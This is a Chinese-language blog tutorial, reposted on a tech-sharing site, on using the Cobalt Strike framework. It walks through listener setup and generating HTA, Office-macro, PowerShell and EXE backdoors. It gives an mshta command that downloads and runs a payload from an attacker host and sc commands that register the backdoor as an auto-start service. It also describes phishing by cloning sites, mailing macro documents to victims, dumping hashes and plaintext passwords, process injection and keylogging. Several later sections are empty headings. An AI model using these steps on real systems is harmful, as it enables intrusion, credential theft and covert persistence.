标签：主机 CobaltStrike 生成 提权 点击 监听器 使用 payload

CobaltStrike

CobaltStrike是一款渗透测试神器，被业界人称为CS神器。CobaltSitrike分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。
CobaliStrike集成了端口转发、服务扫描，自动化溢出，多模式端口监听，windows exe木马生成,windows dll木马生成，java木马生成，office宏病毒生成，木马捆绑。钓鱼攻击包括:站点克隆，目标信息获取，java 执行，浏览器自动攻击等等强大的功能！

启动

条件：需要jdk8版本

启动服务端： ./teamserver   192.168.41.138  123456    
#192.168.41.138是kali的ip地址，123456是密码

后台运行，关闭当前终端依然运行：
nohup  ./teamserver   192.168.10.11  123456  &

启动服务端
使用./start.sh

这里CobaltStrike默认监听的是50050端口，如果我们想修改这个默认端口的话，可以打开teamserver文件，将其中的50050修改成任意一个端口号。
启动成功：

使用

模块介绍

New Connection:打开一个新连接窗口
Preferences:偏好设置，就是设置CobaltStrike外观的
Visualization:将主机以不同的权限展示出来(主要以输出结果的形式展示)。
VPN Interfaces:设置VPN接口
Listeners:创建监听器
Script Interfaces:查看和加载CNA脚本.Close:关闭

创建监听器

CobaltStrike的内置监听器为Beacon，外置监听器为Foreign。CobaltStrike的Beacon支持异步通信和交互式通信。
点击左上方CobaltStrike选项——>在下拉框中选择Listeners——>在下方弹出区域中单机add

name：为监听器名字，可任意
payload：payload类型
HTTP Hosts: shell反弹的主机，也就是我们kali的ip
HTTP Hosts(Stager): Stager的马请求下载payload的地址
HTTP Port(C2): C2监听的端口

payload形式

Attacks攻击（生成后门）

点击attacks->packages

四种后门方式：
1、HTML Application
生成一个恶意HTMLApplication木马，后缀格式为.hta。通过HTML调用其他语言的
应用组件进行攻击，提供了可执行文件、PowerShell、VBA三种方法。
2、MS Office Macro
生成office宏病毒文件;
3、Payload Generator
生成各种语言版本的payload，可以生成基于C、C#、COM Scriptlet、Java、Perl
PowerShell、Python、Ruby、VBA等的payload
4、Windows Executable
生成32位或64位的exe和基于服务的exe、DLL等后门程序
Windows Executable(S)
用于生成一个exe可执行文件，其中包含Beacon的完整payload，不需要阶段性的请
求。与Windows Executable模块相比，该模块额外提供了代理设置，以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本，可用于将Stageless Payload注入内存。
HTML Application ，选择监听器。

创建好木马文件，点击钓鱼

选择Host File

执行： mshta http://192.168.41.129/download/file.ext
MS Office Macro

选择监听器，然后点击Copy Macro

然后打开word编辑器，点击视图，然后点击宏。
输入宏名，点击创建。

清除自带的代码，粘贴复制好的代码，保存退出。
将文档发给其他人，只要是她用word打开，并且开启了宏，我们的CS就会收到弹回来的shell，进程名是rundll32.exe
word开启禁用宏：文件-选项-信任中心-信任中心位置
Payload Generator
0x00 powershell
选择该payload会生成一个payload.ps1文件，可以选择如下方式上线。
powershell下：

Import-Module .\payload.ps1
或
.\payload.ps1

然后在靶机运行即可
cmd下：

powershell Import-Module .\payload.ps1
或
powershell .\payload.ps1

0x01 Powershell Command

选择该payload会生成一个payload.txt文件，可以选择如下方式上线:
直接复制该文件内容在cmd下运行即可上线。


Windows Executable & Windows Executable(S)
这两个模块直接用于生成可执行的exe 文件或dll 文件。Windows Executable是生成Stager类型的马，而Windows Executable(S)是生成Stageless类型的马。
Stager是分阶段传送Payload。
Windowss Executable(S)相比于Windows Executable，其中包含Beacon的完整payload，不需要阶段性的请求，该模块额外提供了代理设置，以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本，可用于将StagelessPayload注入内存。

注意，生成的Windows Service EXE生成的木马，直接双击是不会返回session的。需要以创建服务的方式启动，才会返回session。
#注意，等号（=）后面要有空格
sc create autoRunBackDoor binPath= "cmd.exe /c C:\users\administrator\desktop\cs.exe" start= auto DisplayName= autoRunBackDoor
#开启某个系统服务
sc start autoRunBackDoor 
#停止某个系统服务
sc stop autoRunBackDoor 
# 删除某个系统服务
sc delete service_name

Attacks攻击（钓鱼攻击）

web服务管理：对开启的web服务进行管理;
克隆网站：克隆网站，可以记录受害者提交的数据;
文件下载：提供一个本地文件下载，可以修改Mime信息。可以配合DNS欺骗实现挂马效果使用
Scripted Web Delivery(S)：基于Web的攻击测试脚本，自动生成可执行的payload，通常用这个模块来生成powershell命令反弹shell
签名Applet攻击：启动一个Web服务以提供自签名Java Applet的运行环境;
智能攻击：自动检测Java版本并利用已知的exploits绕过security;
信息搜集：用来获取一些系统信息，比如系统版本，Flash版本，浏览器版本等。

克隆网站：

测试

然后访问URL

视图 --web log可以查看日志

信息收集



然后只要目标访问我们的这个链接，就会自动跳转到百度，并且我们的cs可以获取到目标系统和浏览器的信息。

视图view

Applications 显示受害者机器的应用信息;
Credentials 显示受害者机器的凭证信息，通过hashdump和mimikatz获取的密码都保存在这里;
Downloads 查看从被控机器上下载的文件;
Event Log 可以看到事件日志，清楚的看到系统的事件,并且团队可以在这里聊天;
Keystrokes 查看键盘记录;
Proxy Pivots 查看代理信息;
Screenshots 查看屏幕截图;
Script Console在这里可以加载各种脚本以增强功能，
脚本地址: https://github.comIrsmudge/cortana-scripts
targets 查看目标;
Web Log 查看web日志。

操控主机

Interact       打开beacon
Access 
	dump hashes   获取hash
	Elevate       提权
	Golden Ticket 生成黄金票据注入当前会话
	MAke token    凭证转换
	Run Mimikatz  运行 Mimikatz 
	Spawn As      用其他用户生成Cobalt Strike的beacon
Explore
	Browser Pivot 劫持目标浏览器进程
	Desktop(VNC)  桌面交互
	File Browser  文件浏览器
	Net View      命令Net View
	Port scan     端口扫描
	Process list  进程列表
	Screenshot    截图
Pivoting
	SOCKS Server 代理服务
	Listener     反向端口转发
	Deploy VPN   部署VPN
Spawn            新的通讯模式并生成会话
Session          会话管理，删除，心跳时间，退出，备注

抓取hash和dump明文密码

需要提权。
1、抓取密码哈希：右键被控主机–>Acess–>Dump Hashes
2、利用mimikatz抓取明文密码：右键被控主机–>Access–>Run Minikatz

也可以直接输入：hashdump 抓取密码哈希
或者使用：logonpasswords 抓取明文密码

抓取完之后，点击凭证信息，就会显示我们抓取过的哈希或明文。

提权（Elevate）

有两个payload可以使用。

我们选择相应的payload提权即可。

我们也可以自己加入一些提权脚本进去。
在Github上有一个提权工具包，使用这个提权工具包可以增加几种提权方法:https://github.com/rsmudge/ElevateKit。我们下载好该提权工具包后


load引入即可。

利用被控主机建立Socks4代理

当我们控制的主机是一台位于公网和内网边界的服务器，我们想利用该主机继续对内网进行渗透，于是，我们可以利用CS建立socks4A代理
右键被控主机——>Pivoting——>SOCKS Server
这里是SOCKS代理运行的端口，任意输入一个未占用的端口即可，默认CS会给我们一个，我们直接点击launch即可。


于是，我们在自己的主机上设置Socks4代理。代理ip是我们CS服务端的ip，端口即是35512。
如果我们想查看整个CS代理的设置，可以点击View——>Proxy Pivots

然后我们可以直接在浏览器设置socks4代理。
或者可以点击Tunnel，然后会给我们一个MSF的代理: setg Proxies socks4:xX.XX.XX.xX:35512

进程列表

右键被控主机——>Explore——>Process List

选中该进程，Kill为杀死该进程，Refresh为刷新该进程，Inject则是把beacon注入进程，Log Keystrokes为键盘记录，Screenshot为截图，Stea Token为窃取运行指定程序的用户令牌。

选择进程，点击lnject，随后选择监听器，点击choose，即可发现CobaltStrike弹回了目标机的一个新会话，这个会话就是成功注入到某进程的beacon会话。该功能可以把你的beacon会话注入到另外一个程序之中，注入之后，除非那个正常进程被杀死了，否则我们就—直可以控制该主机了。

任意选择一个进程，点击Log Keystrokes，即可监听该主机的键盘记录。
查看键盘记录结果:点击钥匙一样的按钮，就可以在底下看到键盘记录的详细了，会监听所有的键盘记录，而不只是选中的进程的键盘记录。

浏览器代理brower pivot

生成黄金票据注入当前会话

凭证转换

端口扫描

哈希传递攻击或ssh远程登录

导入并执行本地的powershell脚本

beacon tcp的使用

beacon smb的使用

cobaltstrike常见命令

未完

标签：主机,CobaltStrike,生成,提权,点击,监听器,使用,payload
来源： https://blog.csdn.net/weixin_45253622/article/details/115140034

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。